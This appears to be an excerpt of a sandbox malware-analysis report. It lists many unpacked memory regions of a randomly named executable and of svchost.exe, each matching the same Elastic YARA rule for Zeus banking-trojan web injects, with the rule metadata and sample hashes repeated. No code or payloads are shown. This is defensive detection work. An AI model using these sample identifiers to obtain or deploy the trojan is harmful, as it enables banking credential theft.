Source: 21.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2ca0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.29f3c00.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.d580000.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 9.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.a20000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.34.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.886c00.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.11e2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.UMwpXhA46R.exe.708de8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.50.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.16.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 36.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.15b0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.49.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3c40000.17.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.886c00.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.23.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 36.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1552000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 19.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.11d2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 33.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.b00000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.53.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 7.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.fe2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.14.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.53.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.19.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.25.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.21.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.39.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 33.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2672000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 30.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.25f2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.50.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.47.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 27.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.3040000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.29a2000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.d580000.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.43.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.22.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.44.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1240000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.46.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.16.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
